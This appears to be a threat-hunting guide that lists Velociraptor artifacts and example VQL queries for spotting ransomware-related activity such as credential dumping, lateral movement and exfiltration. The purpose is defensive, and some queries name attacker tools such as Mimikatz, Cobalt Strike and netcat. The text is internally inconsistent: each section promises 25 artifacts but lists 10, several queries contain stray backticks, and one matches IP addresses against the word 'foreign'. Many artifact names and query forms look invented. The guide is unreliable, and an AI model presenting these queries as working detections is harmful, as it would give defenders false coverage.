Velociraptor Artifacts Analysis

Hunting for Ransomware Activities

Malware remains one of the most pervasive and damaging cyber threats organisations face today. It involves software designed to disrupt, damage, or gain unauthorised access to computer systems. Hunting for malware activities is a proactive approach to detect and mitigate malware before it can execute its payload. With tools like Velociraptor to uncover the signs of malware infection and, ultimately, system compromise. Velociraptor, an open-source endpoint monitoring and forensic platform, is excellent at unearthing unusual file access patterns, lateral movement, and command execution. By integrating Velociraptor into your DFIR toolset.

1. Detecting Malware Infection

Description: Malware infection detection involves identifying signs of compromise through executable files, persistence mechanisms, and suspicious behaviour. This section focuses on detecting malware that could be infecting systems through various techniques.

25 Example Velociraptor Artifacts:

1. Artifact Name: Windows.System.Pslist

   • Description: Lists running processes to identify suspicious or malicious executables, such as those frequently associated with malware infections.

2. Artifact Name: Windows.System.Autoruns

   • Description: Identifies autorun entries, which may be exploited by malware for persistence.

3. Artifact Name: Windows.Registry.PersistKeys

   • Description: Detects registry keys commonly used by malware to establish persistence.

4. Artifact Name: Windows.Services.Config

   • Description: Monitors Windows services that could be abused or created by malware to maintain persistence.

5. Artifact Name: Windows.FileSystem.TempFiles

   • Description: Searches for suspicious executable files in temporary directories like C:\Windows\Temp and C:\Users\Public.

6. Artifact Name: Windows.ScheduledTasks

   • Description: Detects non-default scheduled tasks that could be created by malware for recurring execution.

7. Artifact Name: Windows.Prefetch.List

   • Description: Analyzes prefetch files to identify malware that has been executed on the system.

8. Artifact Name: Windows.System.StartupItems

   • Description: Gathers information about items configured to start with Windows, which may be exploited by malware.

9. Artifact Name: Windows.Network.Connections

   • Description: Identifies active network connections that may indicate malware communicating with a command-and-control (C2) server.

10. Artifact Name: Windows.FileSystem.MalwareFiles

    • Description: Searches for known malware file hashes in common directories.

2. Actor Discovery Activities

Description: Discovery activities involve attackers attempting to gather information about the environment, including systems, users, and network shares. Monitoring these activities can provide early indicators of compromise.

25 Example Velociraptor Artifacts:

1. Artifact Name: Windows.Network.Connections

   • Description: Lists current network connections to detect port scanning or enumeration tools like nmap.

2. Artifact Name: Windows.System.PowerShellHistory

   • Description: Reviews PowerShell command history to detect discovery commands such as Get-Process or Get-ADUser.

3. Artifact Name: Windows.SMBClientShares

   • Description: Identifies remote SMB shares that have been accessed, potentially indicating reconnaissance activities.

4. Artifact Name: Windows.System.Netstat

   • Description: Tracks network statistics to detect anomalous connections or network discovery activities.

5. Artifact Name: Windows.WMI.Event

   • Description: Monitors for suspicious use of Windows Management Instrumentation (WMI) for discovery purposes.

6. Artifact Name: Windows.System.EnvironmentVariables

   • Description: Checks for environment variable manipulations, often used to discover system information or misconfigurations.

7. Artifact Name: Windows.System.Sysinfo

   • Description: Provides system information that attackers often query during the discovery phase (e.g., systeminfo.exe).

8. Artifact Name: Windows.Security.LocalAccounts

   • Description: Lists local user accounts, which could indicate attackers querying for users or groups.

9. Artifact Name: Windows.Network.ListAdapters

   • Description: Monitors network adapter information for changes or signs of network discovery.

10. Artifact Name: Windows.Audit.AccountLogonEvents

    • Description: Captures events related to user logon activities, which attackers often target during discovery.

3. Credential Theft Attempts

Description: Credential theft enables attackers to escalate privileges or move laterally across systems. These artifacts focus on detecting malicious attempts to dump or steal credentials from memory, registries, or credential stores.

25 Example Velociraptor Artifacts:

1. Artifact Name: Windows.Registry.SAM

   • Description: Collects information from the Security Account Manager (SAM) database, often targeted in credential dumping attacks.

2. Artifact Name: Windows.Handles.LSASS

   • Description: Monitors for processes attempting to access LSASS (Local Security Authority Subsystem Service) memory, a common target for credential theft.

3. Artifact Name: Windows.System.CredentialGuard

   • Description: Examines Credential Guard settings to check if credentials are protected against theft.

4. Artifact Name: Windows.Registry.DPAPI

   • Description: Monitors for decryption attempts on Data Protection API (DPAPI) credentials.

5. Artifact Name: Windows.EventLog.Security_4625

   • Description: Gathers failed logon attempt events (Event ID 4625), which could indicate brute force or password guessing attacks.

6. Artifact Name: Windows.System.KeyLogger

   • Description: Detects keylogging software used to steal credentials.

7. Artifact Name: Windows.LSASS.Dump

   • Description: Looks for memory dumps of LSASS, a technique used by attackers to steal credentials.

8. Artifact Name: Windows.CachedLogonTokens

   • Description: Searches for cached logon tokens that could be used by attackers to authenticate as another user.

9. Artifact Name: Windows.Registry.SAMHiveDump

   • Description: Detects attempts to dump the SAM hive, which stores hashed passwords for local accounts.

10. Artifact Name: Windows.Kerberos.TicketGrants

    • Description: Monitors for unusual Kerberos ticket-granting-ticket (TGT) requests, which could indicate credential theft.

4. Lateral Movement Evidence

Description: Lateral movement allows attackers to expand access across a network, using tools and techniques like remote services, file sharing, and administrative accounts. These artifacts help detect such activities.

25 Example Velociraptor Artifacts:

1. Artifact Name: Windows.Sysinternals.PsExec

   • Description: Monitors the use of Sysinternals PsExec, a common tool for remote execution and lateral movement.

2. Artifact Name: Windows.EventLog.Security_4624

   • Description: Captures successful logon events (Event ID 4624) to identify lateral movement across accounts and machines.

3. Artifact Name: Windows.EventLog.Security_4648

   • Description: Tracks explicit credential use during logons (Event ID 4648), often associated with lateral movement attempts.

4. Artifact Name: Windows.RDP.Connections

   • Description: Identifies new or unusual Remote Desktop Protocol (RDP) connections, which could indicate lateral movement.

5. Artifact Name: Windows.SMB.Sessions

   • Description: Tracks active SMB sessions to detect potential lateral movement via file shares.

6. Artifact Name: Windows.WinRM.Access

   • Description: Monitors for usage of Windows Remote Management (WinRM) for remote execution, which may be exploited in lateral movement.

7. Artifact Name: Windows.Powershell.RemoteExecution

   • Description: Detects remote execution of PowerShell commands using New-PSSession, which attackers use for lateral movement.

8. Artifact Name: Windows.EventLog.Security_4769

   • Description: Detects Kerberos service ticket request events (Event ID 4769), which may indicate lateral movement attempts via pass-the-ticket.

9. Artifact Name: Windows.AdminShares.Access

   • Description: Identifies unauthorized access to administrative shares (e.g., C$), often used during lateral movement.

10. Artifact Name: Windows.System.WMIEvents

    • Description: Monitors for WMI-based remote execution, commonly used in lateral movement scenarios.

5. Data Theft Attempts

Description: Data exfiltration involves stealing sensitive data, often using file transfer methods or network connections to external locations. These artifacts help detect signs of data theft.

25 Example Velociraptor Artifacts:

1. Artifact Name: Windows.FileSystem.LargeFiles

   • Description: Identifies large files that could be compressed or moved as part of data exfiltration.

2. Artifact Name: Windows.Network.FTPConnections

   • Description: Monitors for FTP connections, a common method for transferring stolen data.

3. Artifact Name: Windows.Network.DNSQueries

   • Description: Tracks DNS queries to identify connections to external domains used for data exfiltration.

4. Artifact Name: Windows.FileSystem.USBDevices

   • Description: Detects USB devices that may be used for data theft via physical storage.

5. Artifact Name: Windows.Cloud.StorageAccess

   • Description: Monitors for connections to cloud storage services (e.g., Google Drive, Dropbox), often used in data exfiltration.

6. Artifact Name: Windows.Network.HighBandwidthTransfers

   • Description: Tracks high-volume outbound traffic, which could indicate data theft over the network.

7. Artifact Name: Windows.EventLog.Security_4663

   • Description: Captures file access events (Event ID 4663) to detect unauthorized access to sensitive files.

8. Artifact Name: Windows.System.RDPFileCopy

   • Description: Detects file copy actions over RDP sessions, often used to exfiltrate data.

9. Artifact Name: Windows.FileSystem.EncryptedFiles

   • Description: Identifies files encrypted before exfiltration, a common technique used by ransomware actors.

10. Artifact Name: Windows.FileSystem.FileShares

    • Description: Monitors file shares for unusual activity or access, which could indicate attempts to steal data.

6. Execution of Actor Tools & Command-Line Activities

Description: Attackers use a variety of tools and command-line utilities to execute their malicious actions. These artifacts help detect the use of attacker tools and suspicious command-line executions

25 Example Velociraptor Artifacts

1. Artifact Name: Windows.Processes.Cmdline

   • Description: Gathers command-line execution details to detect malicious use of administrative or attacker tools.

2. Artifact Name: Windows.System.PowerShellExecution

   • Description: Monitors PowerShell executions, especially those bypassing execution policies or running encoded commands.

3. Artifact Name: Windows.CobaltStrike.Beacons

   • Description: Detects execution of Cobalt Strike beacons, a tool used by many advanced threat actors.

4. Artifact Name: Windows.System.NetcatUsage

   • Description: Tracks the use of Netcat, a tool often used for remote connections and data exfiltration.

5. Artifact Name: Windows.System.CmdExec

   • Description: Identifies suspicious use of cmd.exe, often used for script execution or administrative tasks.

6. Artifact Name: Windows.Metasploit.Execution

   • Description: Detects usage of Metasploit, a common framework for exploitation and pivoting.

7. Artifact Name: Windows.System.ScheduledTaskCreation

   • Description: Monitors for the creation of scheduled tasks that may be used to run attacker tools periodically.

8. Artifact Name: Windows.System.WScriptExecution

   • Description: Tracks executions of Windows Script Host (wscript.exe), which attackers frequently abuse to execute scripts.

9. Artifact Name: Windows.EventLog.Security_4688

   • Description: Captures process creation events (Event ID 4688) to monitor for suspicious command-line executions.

10. Artifact Name: Windows.System.EncodedScriptExecution

    • Description: Detects execution of encoded or obfuscated scripts, often used to hide malicious actions.

7. Identity & Logon Activities Using Windows Security Logs

Description: Monitoring user logon activities can help identify compromised accounts, unusual logon times, and suspicious access patterns.

25 Example Velociraptor Artifacts:

1. Artifact Name: Windows.EventLog.Security_4624

   • Description: Gathers successful logon events to detect unauthorized access or suspicious logon activities.

2. Artifact Name: Windows.EventLog.Security_4625

   • Description: Collects failed logon attempts, which could indicate brute force or account enumeration attempts.

3. Artifact Name: Windows.EventLog.Security_4648

   • Description: Monitors for explicit logons where credentials are provided manually, often indicating lateral movement.

4. Artifact Name: Windows.EventLog.Security_4672

   • Description: Tracks privileged logon events, which could signal unauthorized use of administrative accounts.

5. Artifact Name: Windows.EventLog.Security_4769

   • Description: Detects Kerberos service ticket requests, which could indicate lateral movement via pass-the-ticket.

6. Artifact Name: Windows.EventLog.Security_4771

   • Description: Captures failed Kerberos pre-authentication attempts, potentially indicating password brute-force attempts.

7. Artifact Name: Windows.EventLog.Security_4776

   • Description: Monitors NTLM authentication events, useful for identifying pass-the-hash or relay attacks.

8. Artifact Name: Windows.EventLog.Security_4647

   • Description: Detects user logoff events to track anomalous session terminations.

9. Artifact Name: Windows.EventLog.Security_4634

   • Description: Gathers logoff events to correlate with other suspicious user activity.

10. Artifact Name: Windows.Security.LocalAccountCreation

    • Description: Monitors for new user accounts created locally, which could indicate the creation of backdoor accounts.

Threat-Hunting Guide Using Velociraptor Artifacts: With Example VQL

1. Malware Infection Detection

Description: Malware infections involve malicious code or files being installed or executed on the system. Attackers often use these infections to establish persistence and gain control over the system.

Example Velociraptor Artifact: Windows.System.Pslist

• Artifact Description: Lists all running processes, helping identify suspicious or malicious executables running on the system.

5 Example VQL Queries for Malware Detection:

1. Query: Detect execution of suspicious PowerShell scripts used in malware infections.

SELECT * FROM pslist() WHERE cmdline LIKE '%powershell%' AND cmdline LIKE '%Invoke%'

Description: Detects malicious PowerShell scripts often used for downloading or executing malware payloads.

1. Query: Search for unsigned or suspicious executables in the C:\Windows\Temp directory.

SELECT * FROM fileinfo() WHERE filename LIKE 'C:\\Windows\\Temp\\%' AND signed = false

Description: Detects unsigned files, often used by malware during execution.

1. Query: Identify persistent malware by checking for new services.

SELECT * FROM services() WHERE start_type = 'auto' AND path LIKE '%.exe%'

Description: Detects new services created by malware to ensure persistence across reboots.

1. Query: Detect executable files running from unusual directories (e.g., user folders).

SELECT * FROM pslist() WHERE path LIKE 'C:\\Users\\%'

Description: Identifies executables launched from non-standard directories often used by malware.

1. Query: Detect the presence of malware-related prefetch files.

SELECT * FROM prefetch() WHERE filename LIKE '%malware%'

Description: Detects execution of malware based on prefetch file entries.

2. Actor Discovery Activities

Description: Discovery activities are used by attackers to learn more about the environment, such as gathering information about the network, users, and systems.

Example Velociraptor Artifact: Windows.Network.Connections

• Artifact Description: Lists active network connections, which can help identify scanning and reconnaissance activities.

5 Example VQL Queries for Actor Discovery:

1. Query: Detect network scanning tools like nmap or masscan.

SELECT * FROM pslist() WHERE cmdline LIKE '%nmap%' OR cmdline LIKE '%masscan%'

Description: Detects popular network scanning tools used for reconnaissance.

1. Query: Detect network discovery commands like netstat or arp.

SELECT * FROM pslist() WHERE cmdline LIKE '%netstat%' OR cmdline LIKE '%arp -a%'

Description: Detects common network enumeration tools used by attackers.

1. Query: Search for SMB share enumeration activity.

SELECT * FROM pslist() WHERE cmdline LIKE '%net view%' OR cmdline LIKE '%net share%'

Description: Detects attempts to enumerate SMB shares in the network.

1. Query: Monitor for ARP scanning activities.

SELECT * FROM network() WHERE protocol = 'ARP'

Description: Identifies ARP scans used by attackers to map out IP addresses in the local network.

1. Query: Detect WMI-based system discovery attempts.

SELECT * FROM pslist() WHERE cmdline LIKE '%wmic%' AND cmdline LIKE '%computersystem%'

Description: Detects WMI commands used by attackers to gather system information.

3. Credential Theft Attempts

Description: Credential theft attempts involve attackers trying to extract user credentials from memory, files, or the registry. These credentials are then used to escalate privileges or move laterally within the network.

Example Velociraptor Artifact: Windows.Registry.SAM

• Artifact Description: Examines the SAM registry hive for credential dumping activities.

5 Example VQL Queries for Credential Theft:

1. Query: Detect attempts to access LSASS memory for credential dumping.

SELECT * FROM handles() WHERE process_name = 'lsass.exe' AND access LIKE '%READ%'

Description: Identifies attempts to dump credentials from LSASS memory.

1. Query: Search for known credential dumping tools like Mimikatz.

SELECT * FROM pslist() WHERE cmdline LIKE '%mimikatz%'

Description: Detects the use of Mimikatz, a popular tool for stealing credentials.

1. Query: Monitor access to the SAM registry hive, which stores hashed user credentials.

SELECT * FROM registry() WHERE key_path LIKE 'HKLM\\SAM\\%'

Description: Detects unauthorized access to the SAM registry hive.

1. Query: Detect suspicious access to the Windows credential manager.

SELECT * FROM fileinfo() WHERE path LIKE 'C:\\Windows\\System32\\config\\CredentialManager'

Description: Monitors attempts to access the credential manager, where sensitive user credentials may be stored.

1. Query: Detect Kerberos ticket-granting-ticket (TGT) extraction attempts.

SELECT * FROM windows_event_log() WHERE event_id = 4768

Description: Tracks unusual Kerberos TGT requests that may be used in ticket-based attacks.

4. Evidence of Lateral Movement

Description: Lateral movement refers to an attacker’s ability to move through a network by exploiting remote services, shared credentials, or other vectors. Detecting these movements is crucial for containing an attacker’s spread.

Example Velociraptor Artifact: Windows.Sysinternals.PsExec

• Artifact Description: Detects the use of PsExec, a common tool used by attackers to remotely execute commands on another machine.

5 Example VQL Queries for Lateral Movement:

1. Query: Detect usage of Sysinternals PsExec for remote command execution.

SELECT * FROM pslist() WHERE cmdline LIKE '%psexec%'

Description: Detects PsExec usage, which is commonly used for lateral movement.

1. Query: Monitor for PowerShell remoting sessions.

SELECT * FROM windows_event_log() WHERE event_id = 4104 AND script_block_text LIKE '%New-PSSession%'

Description: Detects the creation of new remote PowerShell sessions used by attackers for lateral movement.

1. Query: Detect usage of Remote Desktop Protocol (RDP) for lateral movement.

SELECT * FROM rdp_sessions() WHERE event_type = 'connect'

Description: Identifies RDP connections that could indicate lateral movement between machines.

1. Query: Monitor access to administrative shares (e.g., C$).

SELECT * FROM smb_sessions() WHERE share_name = 'C$'`

Description: Tracks access to administrative shares, which can be used in lateral movement.

1. Query: Detect remote command execution using WinRM.

SELECT * FROM pslist() WHERE cmdline LIKE '%winrm%' AND cmdline LIKE '%RemoteShell%'`

Description: Detects the use of Windows Remote Management (WinRM) for executing commands on remote systems.

5. Data Theft Attempts

Description: Data theft attempts involve stealing sensitive information, often by exfiltrating files over the network or copying data to external storage devices.

Example Velociraptor Artifact: Windows.FileSystem.USBDevices

• Artifact Description: Monitors connected USB devices, which could be used to exfiltrate data.

5 Example VQL Queries for Data Theft:

1. Query: Detect high-volume outbound network traffic that could indicate data exfiltration.

SELECT * FROM network() WHERE bytes_out > 10000000

Description: Tracks large outbound data transfers, which could indicate data theft.

1. Query: Detect the use of file compression tools like WinRAR or 7-Zip.

SELECT * FROM pslist() WHERE cmdline LIKE '%winrar%' OR cmdline LIKE '%7z%'

Description: Detects the use of compression tools, often used to prepare data for exfiltration.

1. Query: Monitor for suspicious FTP connections used to exfiltrate data.

SELECT * FROM network() WHERE remote_port = 21 AND protocol = 'tcp'

Description: Identifies FTP connections, a common method for transferring stolen data.

1. Query: Detect file uploads to cloud storage services like Dropbox or Google Drive.

SELECT * FROM network() WHERE remote_address LIKE '%dropbox%' OR remote_address LIKE '%google%'

Description: Tracks file transfers to cloud storage services often used by attackers to exfiltrate data.

1. Query: Monitor for USB devices connected during suspicious file transfers.

SELECT * FROM usb_devices() WHERE event_type = 'connect'`

Description: Detects when USB storage devices are connected to the system, which could be used for data theft.

6. Execution of Actor Tools & Command-Line Activities

Description: Attackers use a variety of tools and scripts to achieve their objectives. Monitoring the execution of these tools and their associated command-line activity can help detect compromise.

• Artifact Description: Collects command-line execution data from processes to identify the use of attacker tools or malicious commands.

5 Example VQL Queries for Execution of Actor Tools:

1. Query: Detect execution of Cobalt Strike beacons.

SELECT * FROM pslist() WHERE cmdline LIKE '%cobaltstrike%'

Description: Tracks the execution of Cobalt Strike, a commonly used post-exploitation framework.

1. Query: Detect suspicious PowerShell commands bypassing execution policies.

SELECT * FROM pslist() WHERE cmdline LIKE '%powershell%' AND cmdline LIKE '%bypass%'

Description: Identifies PowerShell commands attempting to bypass execution policies, commonly used in attacks.

1. Query: Monitor for encoded or obfuscated scripts executed via PowerShell.

SELECT * FROM pslist() WHERE cmdline LIKE '%powershell%' AND cmdline LIKE '%-encodedcommand%'

Description: Detects encoded scripts executed in PowerShell, often used to hide malicious activities.

1. Query: Detect Metasploit payloads being executed.

SELECT * FROM pslist() WHERE cmdline LIKE '%metasploit%'

Description: Tracks the execution of Metasploit, a popular penetration testing tool used by attackers.

1. Query: Monitor suspicious cmd.exe activity.

SELECT * FROM pslist() WHERE cmdline LIKE '%cmd.exe%' AND cmdline LIKE '%/c%'

Description: Detects suspicious command-line execution using cmd.exe, often used in post-exploitation.

7. Identity & Logon Activity Monitoring

Description: Monitoring logon events can reveal compromised accounts, brute force attempts, and unusual authentication patterns, which may indicate an ongoing attack.

Example Velociraptor Artifact: Windows.EventLogs.Security

• Artifact Description: Collects Windows security logs related to user logon and authentication activities.

5 Example VQL Queries for Identity & Logon Monitoring:

1. Query: Detect failed logon attempts (Event ID 4625).

    SELECT * FROM windows_event_log() WHERE event_id = 4625

Description: Tracks failed logon attempts that may indicate brute force or password guessing attacks.

1. Query: Detect suspicious logon activities from foreign IP addresses.

SELECT * FROM windows_event_log() WHERE event_id = 4624 AND ip_address LIKE '%foreign%'

Description: Monitors for successful logons from unexpected or foreign IP addresses.

1. Query: Monitor logons using administrative accounts (Event ID 4672).

SELECT * FROM windows_event_log() WHERE event_id = 4672

Description: Tracks the use of privileged accounts, which may indicate abuse or compromise of admin credentials.

1. Query: Detect abnormal logon types, such as network logons (Event ID 4624).

SELECT * FROM windows_event_log() WHERE event_id = 4624 AND logon_type = 3

Description: Monitors network logons, often used in lateral movement and remote access.

1. Query: Detect Kerberos ticket-granting-service (TGS) requests (Event ID 4769).

SELECT * FROM windows_event_log() WHERE event_id = 4769

Description: Tracks Kerberos TGS requests, often used in pass-the-ticket attacks.